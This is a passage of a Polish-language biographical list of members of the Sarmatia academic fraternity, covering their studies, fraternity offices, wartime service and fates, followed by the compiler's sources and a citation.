 173. Karol Schloesser, (9 grudnia 1902 - luty 1994) student SGGW, c. 1923, akt. 1923-25, inż. rolnik, w czasie wojny polsko-bolszewickiej w 203 Pułku Ułanów, od 1947 na emigracji w Wielkiej Brytanii
 174. Bolesław Siekierzyński, ( - po 1945) student SGGW, c. 1931, inż. rolnik, w wojnie obronnej 1939 w obronie Westerplatte
 175. Stanisław Siekierzyński, student KUL Lublin, PL Lwów (?), UW, c. 1931, akt. 1931-32, prawnik UW, żołnierz AK, zamordowany przez Gestapo w Radogoszczy
 176. Stefan Siemieński, (27 września 1905 - 29 listopada 1945) brat Leona (Arkonia), student i absolwent prawa UW, c. 1924, akt. 1924-26, sekretarz sem. let. 1925/26, sekretarz WKM-u 1925/26, po studiach pracownik MSZ, na placówkach w Buenos Aires i Rydze, w czasie wojny w PSZ na Zachodzie, uczestnik kampanii francuskiej 1940, w niewoli niemieckiej, zwolniony ze względu na chorobę, przedostał się do Wielkiej Brytanii, zmarł po zakończeniu działań wojennych
 177. Władysław Sikorski, ze Żmudzi, student Uniwersytetu w Petersburgu, członek Sarmacji w Petersburgu, c. 1908, prawnik

  Stefan Skalski, lata 20-te (?).

 178. Stefan Skalski, (13 listopada 1886 - 27 sierpnia 1975) student Instytutu Technologicznego w Petersburgu i prawa UW, członek Sarmacji w Petersburgu, c. 1910, żołnierz wojny polsko-bolszewickiej 1920, odznaczony Krzyżem Virtuti Militari, żołnierz wojny obronnej 1939, w czasie okupacji w AK, więzień m.in. obozu koncentracyjnego Schulzendorf, adwokat, inicjator i prezes Związku Filistrów Sarmacji 1945-75

  Zbigniew Skolimowski, 1938 r.

 179. Zbigniew Skolimowski, (26 czerwca 1913 - ) student SGH, c. 1931, akt. 1931-38, wiceolderman sem. zim. 1937/38, prezes sem. let. 1937/38, ekonomista, w czasie wojny obronnej 1939 w 10 Pułku Ułanów, odznaczony Krzyżem Walecznych, w czasie wojny w 1 Dywizji Pancernej PSZ na Zachodzie, odznaczony Krzyżem Walecznych, po wojnie na emigracji we Francji

 180. Stefan Jerzy Słubicki, (5 lipca 1900 w Choceniu w pow. włocławskim - 1940 w Katyniu) s. Stanisława i Walerii z Karasińskich, członek POW, żołnierz wojny polsko-rosyjskiej 1920, student PW, c. 1920, inż., ppor. rez., przydzielony do 7 Pułku Strzelców Konnych Wielkopolskich, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Medalem Niepodległości
 181. Jerzy Smorczewski, ( - 1934) student prawa UW, c. 1928, akt. 1928-32
 182. Józef Staniewicz, ( - po 17 września 1939) z Oszmiańskiego, student prawa Uniwersytet w Petersburgu, założyciel Sarmacji w Petersburgu 1908, prezydent miasta Oszmiany 1939, aresztowany przez Sowietów i wywieziony, zaginął bez wieści na Wschodzie
 183. Roman Staniszewski, (1908 - 28 lutego 1968) student UW, akt. 1928-32, prawnik, w wojnie obronnej 1939 w artylerii, odznaczony Krzyżem Walecznych, więzień obozu w Murnau

  Jerzy Staniszkis, 2007 r.

 184. Jerzy Staniszkis, (23 listopada 1914 w Kutnie - 17 marca 2009 w Warszawie) syn Witolda Teofila, brat Olgierd (Sarmatia), absolwent Gimnazjum im. S. Batorego, student PW, c. 1935, inż. architekt, w czasie wojny obronnej w 3 Pułku Szwoleżerów Mazowieckich, odznaczony czterokrotnie Krzyżem Walecznych, więzień oflagu w Woldenbergu, po wojnie w Biurze Odbudowy Stolicy, od 1950 prof. Wyższej Szkoły Sztuk Pięknych w Poznaniu, specjalizował się w architekturze wystawienniczej, 1962-87 prof. Wydziału Architektury Uniwersytetu w Detroit, po 1989 w Polsce, zastępca członka Zarządu Stowarzyszenia Filistrów Korporacji Akademickich 1995-97, twórca projektu Pomnika Państwa Podziemnego przed Sejmem RP, odznaczony Orderem Polonia Restituta, Złotym Krzyżem Zasługi, Złotym Krzyżem Węgierskim. Vide także nekrolog w Aktualności 2009.

 185. Olgierd Staniszkis, (7 grudnia 1910 - listopad 2006) syn Witolda Teofila, brat Jerzego (Sarmatia) absolwent Gimnazjum im. S.Batorego, student SGGW, c. 1929, akt. 1929-32, wiceprezes sem. zim. 1932/33, prezes Bratniej Pomocy Studentów SGGW, dr inż. nauk rolniczych, w wojnie obronnej 1939 w 3 Pułku Szwoleżerów Mazowieckich, odznaczony Krzyżem Virtuti Militari i dwukrotnie Krzyżem Walecznych, więzień oflagu w Woldenbergu

  Walery Starczewski Val, 1921 r.

 186. Walery Starczewski Val, (29 sierpnia 1897 - 28 września 1983 w Airlington w Massachusetts) w wojnie polsko-bolszewickiej 1920 ppor. art., student PW 1920-22, c. 1920 Sarmatia, student i absolwent (inż. budownictwa mostów i konstrukcji żelaznych) Wydziału Budownictwa Lądowego PG 1922-26, założyciel i czterokrotny prezes K! Helania, po studiach pracował w różnych firmach, był autorem m.in. projektu pierwszego w Warszawie wieżowca przy Placu Powstańców oraz projektu zapory wodnej w Rożnowie, od 1936 w Stanach Zjednoczonych, działacz polonijny, m.in. prezes Polskiego Związku Kawalerzystów i Artylerzystów Konnych w Stanach Zjednoczonych
  c

 187. Jan Starkiewicz, (1917 - ), c. 1937, w wojnie obronnej 1939 w artylerii, w czasie wojny w 2 Dywizji Strzelców Pieszych we Francji
 188. Jerzy Stokowski, (3 października 1898 - 6 grudnia 1985) student prawa UW, c. 1919, żołnierz w wojnie polsko-bolszewickiej 1920 i wojnie obronnej 1939, po wojnie adwokat
 189. Adam Suchorzewski, (1913 w Koszutach - 7 luty 1972) syn Janusza i Zofii z Różyckich, student SGGW, c. 1935, akt. 1935-39, wiceolderman sem. zim. 1938/39, rolnik, w wojnie obronnej 1939 w kawalerii w Grupie Operacyjnej Narew, po wojnie wieloletni kierownik i dyrektor Państwowych Gospodarstwach Rolnych
 190. Zygmunt Sulimierski, student rolnictwa SGGW, założyciel Sarmacji w Warszawie 1915, w wojnie polsko-bolszewickiej 1920 w kawalerii
 191. Władysław Szczuka, ( - 1966) student PW, c. 1923, akt. 1925-32, inżynier, żołnierz w wojnie obronnej 1939
 192. Jerzy Szturm, ( - 197?) student handlu WSH, c. 1923, akt. 1923-26, olderman sem. let. 1924/25, II wiceprezes 1925/26, wiceprezes WKM-u 1925/26, w czasie studiów w AK “Uprawa”, po wojnie na emigracji w Brazylii

  Andrzej Szweycer, 1937 r.

 193. Andrzej Szweycer, (24 lutego 1912 - 11 września 1990) z Łaska w Sieradzkim, herbu Zadora, s. Janusza i Marii z Dzik-Kożuchowskich, brat Stanisława i Tomasza (obaj Jagiellonia), kuzyn Pawła (Sarmatia), szwagier Konstantego i Władysława (obaj Regia), student SGGW, c. 1931, akt. 1931-32, inż. rolnik, w czasie okupacji w AK “Uprawa”, po wojnie pracownik naukowy, dr i dr habilitowany, praktyk i teoretyk w dziedzinie mechanizacji i organizacji rolnictwa, działacz katolicki, prezes KiK w Poznaniu 1980-83, członek Sądu Honorowego Związku Ziemian Polskich, pochowany na poznańskim Miłostowie

  Paweł Szweycer, 1937 r.

 194. Paweł Szweycer, (1914 - styczeń 1945 w Gradowie k. Sochaczewa) Sochaczewa) herbu Zadora, s. Michała i Heleny z d. Suska, kuzyn Andrzeja (Sarmatia), Stanisława i Tomasza (obaj Jagiellonia), student SGGw, c. 1932, akt. 1932-38, wiceprezes sem. zim. 1937/38, inż. rolnik, w czasie okupacji w AK, zamordowany przez UB po “wyzwoleniu”

 195. Tadeusz Szymborski, (1908 - 25 marca 1983) student SGGW, c. 1928/29, akt. 1928/29-32, wiceprezes sem. zim. 1931/32, inż. rolnik, w czasie okupacji w AK
 196. Wacław Szymborski, ( - 1939 pod Cyrusową Wolą) student SGGW, c. 1931, akt. 1931-32, inż. rolinik, w wojnie obronnej 30 Pułku Strzelców Kaniowskich, poległ pod Cyrusową Wolą
 197. Jerzy Świerczewski, student SGGW, inż. rolnik, żołnierz wojny polsko-bolszewickiej 1920
 198. Jerzy Terczyński, ( - po 1970 w Australii) student UW, c. 1927, akt. 1927-32, olderman sem. zim. 1932/33, mgr chemik, żołnierz w czasie wojny obronnej 1939, w Powstaniu Warszawskim dowódca kompanii “Starża” w 8 Dywizji Piechoty AK na Żoliborzu, po wojnie na emigracji w Australii
 199. Stanisław Totwen, (1891 - 1944/1945 w Oranienburgu ?) z kurlandzkiej rodziny szlacheckiej, student Uniwersytetu w Petersburgu, założyciel Sarmacji w Petersburgu 1908, mgr praw, adwokat w Warszawie, w Powstaniu Warszawskim w AK, później w obozie koncentracyjnym w Oranienburgu, tam zamordowany (?)
 200. Wojciech Nekanda-Trepka, student PW, założyciel Sarmacji w Warszawie 1915, w wojnie polsko-bolszewickiej 1920 w 3 Pułku Ułanów, od 1920 oficer zawodowy, w wojnie obronnej 1939 w 9 Pułku Ułanów, w czasie wojny w PSZ na Zachodzie
 201. Tadeusz Tymiński, (28 grudnia 1905 - 19 stycznia 1967 w Londynie) student PW, c. 1925, akt. 1925-31, inżynier, w wojnie obronnej w 3 Pułku Pancernym, w czasie wojny w PSZ na Zachodzie w 3 Pułku Pancernym, po wojnie na emigracji w Wielkiej Brytanii
 202. Janusz (Stanisław Janusz) Tymowski, (10 października 1912 w Warszawie - 30 września 1986 w Warszawie) syn Karola i Stefanii z d. Ładno, absolwent Gimnazjum im. A. Mickiewicza w Warszawie 1930, student geodezji PW, c. 1931, akt. 1931-32, inż. geodeta 1936, jako ochotnik w wojnie obronnej 1939 w obronie Warszawy, odznaczony Krzyżem Walecznym, w czasie okupacji w ZWZ-AK, w Powstaniu Warszawskim plut. pchor. ps. “Dragin” w 8 Dywizji Piechoty AK na Żoliborzu, po wojnie m.in. w Głównym Urzędzie Pomiarów, Naczelnej Organizacji Technicznej, prezes Związku Filistrów Sarmacji 1975-86, jeden z inicjatorów i twórców korporacyjnej Kwatery Pamięci
 203. Janusz Wagner, (1899 - 9 kwietnia 1959) student PW, c. 1919, akt. 1919-28, inż. mechanik, w wojnie polsko-bolszewickiej, odznaczony Krzyżem Walecznych, wykładowca PW
 204. Jerzy Wagner, ( - 22 sierpnia 1927) student UW, c. 1924, akt. 1924-25, dr medycyny
 205. Wacław Colonna-Walewski, (1906 - 6 lipca 1985) student prawa UW, c. 1928, akt. 1928-32, wiceprezes sem. let. 1930/31, adwokat, w czasie okupacji i w Powstaniu Warszawskim w AK
 206. Stanisław Warzycki, (1905 - 22 września 1944 w Warszawie) student WSH, c. 1927, akt. 1927-31, ekonomista rolink, w czasie okupacji w AK ps. “Szumski”, “Jerzy”, w czasie Powstania w oddziale “Kryska”, poległ na Powiślu (?)
 207. Wacław Wasiutyński, (28 stycznia 1908 w Warszawie - 15 maja 1997 w Montrealu) syn Bogdana (Baltia), brat Witolda (Sarmatia) i Wojciecha (Aquilonia), student WSH, c. 1927, akt. 1928-32, wiceolderman sem. zim. 1929/30, wiceprezes sem. zim. 1930/31, prezes sem. let. 1930/31, sekretarz zewnętrzny ZPKA 1930 (IX kadencja), ekonomista, w wojnie obronnej 1939 w 5 Pułku Piechoty Legionów, w czasie wojny w 2 Dywizji Strzelców Pieszych we Francji, po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, pochowany w Pradze w Czechach

  Witold Wasiutyński, 1938 r.

 208. Witold Wasiutyński, (3 lipca 1919 - 6 stycznia 1994) syn Bogdana (Baltia), brat Wacława (Sarmatia) i Wojciecha (Aquilonia), student PW, c. 1937, akt. 1937, mgr inż. budowy lądowej i inż. górnik, w czasie wojny w latach 1940-45 w obozach koncentracyjnych: Sachsenhausen, Auschwitz, Buchenwald i Teresinstadt w Sudetach

 209. Jan Wegner, ( - przed 1939) student PW, c. 1918, akt. 1918-25, w wojnie polsko-bolszewickiej 1920, inżynier
 210. Andrzej Weissbrod, (31 sierpnia 1912 - 21 czerwca 1940 w Palmirach) student PW, c. 1931, akt. 1931-38, wiceprezes sem. let. 1937/38, inż. mechanik, w wojnie obronnej 1939 w PW uzbrojeniu, aresztowany i rozstrzelany w egzekucji w Palmirach

  Jan Werner, 1929 r.

 211. Jan Ryszard Werner, (10 stycznia 1904 w Warszawie - 7 kwietnia 1966 w Łodzi) herbu Miron, s. Konstantyna Juliana i Anny Katarzyny z d. Wildt, daleki kuzyn Józefa (Sarmatia) i Jana (Kujawja), jako harcerz walczył w wojnie polsko-bolszewickiej 1920, absolwent Gimnazjum Mazowieckiego w Warszawie, student i absolwent (inż. mechanik) komunikacji Wydziału Mechanicznego PW 1922-28, c. 1925, akt. 1925-28, wiceprezes sem. zim. 1926/27, olderman sem. zim. 1927/28, służba wojskowa w Szkole Podchorążych Piechoty w Tomaszowie Mazowieckim (?) ok. 1927, wybitny konstruktor silników spalinowych, współtwórca przedwojennej polskiej motoryzacji, po wojnie konstruktor silnika samochodu ciężarowego Star – 20 i silników dla rolnictwa, w czasie okupacji w konspiracji w ZWZ-AK ps. “Karol” i “Irving”, skonstruował miotacz ognia produkowany konspiracyjnie w zakładach Gerlacha, awansowany na stopień kapitana, w drodze punktu zbornego powstania warszawskiego zatrzymany przez strzelaninę, w powstaniu udziału nie wziął, wyszedł z Warszawy przez Pruszków, po wojnie prof. i prorektor Politechniki Łódzkiej, otrzymał nagrodę państwową dla zespołu twórców samochodu ciężarowego Star 20, odznaczony Krzyżem Oficerskim OOP 1964, pochowany na Cmentarzu Ewangelicko-Augsburskim w Warszawie (al. 9, rz. 1, m. 12) [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Andrzeja Wernera]

  Józef Werner, 1927 r.

 212. Józef Werner, (7 czerwca 1901 w miejsc. Pełczyska w Łęczyckim - 14 października 1972 w Konstancinie k. Warszawy) herbu Miron, s. Adolfa (Welecja) i Zofii z d. Boetticher, brat Jana (Kujawja), daleki kuzyn Jana (Sarmatia), student SGGW, c. 1923, akt. 1923-28, olderman sem. zim. 1926/27, inż. rolnik, właściciel maj. Skotniki, w czasie okupacji w AK “Uprawa”, po wojnie jako “obszarnik” odsunięty od bezpośrednie działalności w gospodarce wiejskiej pracował w jednym z instytutów PAN, pochowany na Cmentarzu Ewangelicko-Augsburskim w Warszawie [Źródła (poza wskazanymi poniżej spisu członków): dane przekazane przez Andrzeja Wernera]

 213. Bogdan Jelita-Wilkoszewski, (17 grudnia 1910 - 30 listopada 1994 w Warszawie) student SGGW, c. 1931, akt. 1931-32, sekretarz sem. zim. 1932/33, absolwent SGGW, mgr inż. rolnik
 214. Jan Wojtowicz, ( - 23 listopada 1943) c. 1937, w czasie okupacji w AK, rozstrzelany w Warszawie w egzekucji ulicznej
 215. Andrzej Wolicki, ( - po 1920) żołnierz wojny polsko-bolszewickiej 1920
 216. Stefan Wolicki, żołnierz wojny polsko-bolszewickiej 1920
 217. Jerzy Woyno, ( - 1942) student PW, c. 1923, akt. 1923-25, inż. budowy dróg i mostów, w czasie okupacji w AK, rozstrzelany w Płocku
 218. Aleksander Piotr Zajdler, (1898 - 1 października 1971) student PW, c. 1922, w czasie wojny polsko-bolszewickiej 1920, inż. chemik
 219. Jan Adalbert Zakrzewski Dołęga, (1913 - 12 grudnia 2002) absolwent Gimnazjum im. W. Górskiego w Warszawie, student SGGW, c. 1932, akt. 1932, inż. rolnik, w czasie okupacji w Wydziale Wywiadu Przemysłowo-Gospodarczego AK, żołnierz w Powstaniu Warszawskim, pochowany na warszawskich Powązkach
 220. Czesław Zawisza, ( - przed 1939) student PW, c. 1918, akt. 1918-28, żołnierz w wojnie polsko-bolszewickiej 1920, inżynier

  Bolesław Zembrzuski, 1931 r. (?).

 221. Bolesław Zembrzuski, (22 lutego 1880 w Jędrzejowie -1939) z Kieleckiego, ojciec Mieczysława, stryj Janusza i Stosława (wszyscy Sarmatia) student prawa Uniwersytetu w Petersburug, współinicjator stworzenia Sarmacji w Warszawie, członek honorowy Sarmacji w Petersburgu 1915, mgr praw, notariusz, sekretarz Związku Organizacji Filisterskich, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA

 222. Janusz Zembrzuski, (25 listopada 1907 w Warszawie - 1940 w Charkowie) s. Stanisława i Marii z Chrząszczewskich, brat Stosława (Sarmatia), bratanek Bolesława, brat stryjeczny Mieczysława (obaj Sarmatia), student i absolwent med. UW, c. 1925, akt. 1925-32, dr med., chirurg, asystent II oddziału chirurgicznego w Szpitalu Dzieciątka Jezus w Warszawie, por. rez. służby zdrowia, przydzielony do 30 Pułku Piechoty, w wojnie obronnej 1939 lekarz pułkowy 111 Szpitala Ewakuacyjnego, wzięty do niewoli z całym szpitalem, w obozie jenieckim w Starobielsku, zamordowany przez NKWD

  Mieczysław Zembrzuski, 1974 r.

 223. Mieczysław Zembrzuski, (6 czerwca 1905 w Augustówku k. Grodna - 8 października 1983 ) syn Bolesława, brat stryjeczny Janusza i Stosława (wszyscy Sarmatia), student UW, c. 1925, akt. 1925-28, I wiceprezes sem. zim. 1925/26, prezes sem. zim. 1926/27, mgr praw, adwokat, prezes Związku Filistrów Sarmacji 1931, por. rez., w wojnie obronnej w 2 Pułku Ułanów Grochowieckich, jeniec obozu w Woldenbergu

 224. Stosław Zembrzuski, ( - 1939-45 na Litwie) s. Stanisława i Marii z Chrząszczewskich, brat Janusza (Sarmatia), bratanek Bolesława, brat stryjeczny Mieczysława (obaj Sarmatia), student SGGW, akt. 1925-28, sekretarz sem. zim. 1925/26, inż. rolnik
 225. Andrzej Zieliński, (1912 - 25 lilpca 1932 w Jastrzębiej Górze) syn Antoniego i Wandy, student WSH, c. 1931, akt. 1931-32, utonął w Bałtyku w Jastrzębiej Górze
 226. Czesław Żakiewicz, (7 września 1904 - 1996 w Londynie) student PW, c. 1925, akt. 1925-29, inż. elektryk, w wojnie obronnej 1939 w artylerii, w czasie wojny w PSZ na Zachodzie w przemyśle zbrojeniowym, po wojnie na emigracji w Wielkiej Brytanii
 227. Stanisław Żmijewski, (20 stycznia 1909 - 16 listopada 1996) student SGGW, c. 1928, akt. 1928-32, mgr inż. rolnik, w czasie okupacji w AK

Okładka Księgi 80-lecia Sarmatii.

Listę członków opracowano na podstawie:

1) Bogusław Dobrzyński, Stanisław Lewicki, Józef Rudowski, Olgierd Staniszkis (red.), Polska Korporacja Akademicka Sarmatia. 80-lecie, b.m i r.w. (”Księga 80-lecia Sarmatii”, Warszawa 1988),
2) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1925-1932,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Sarmatia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 22 III 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Sarmatia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 22 III 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }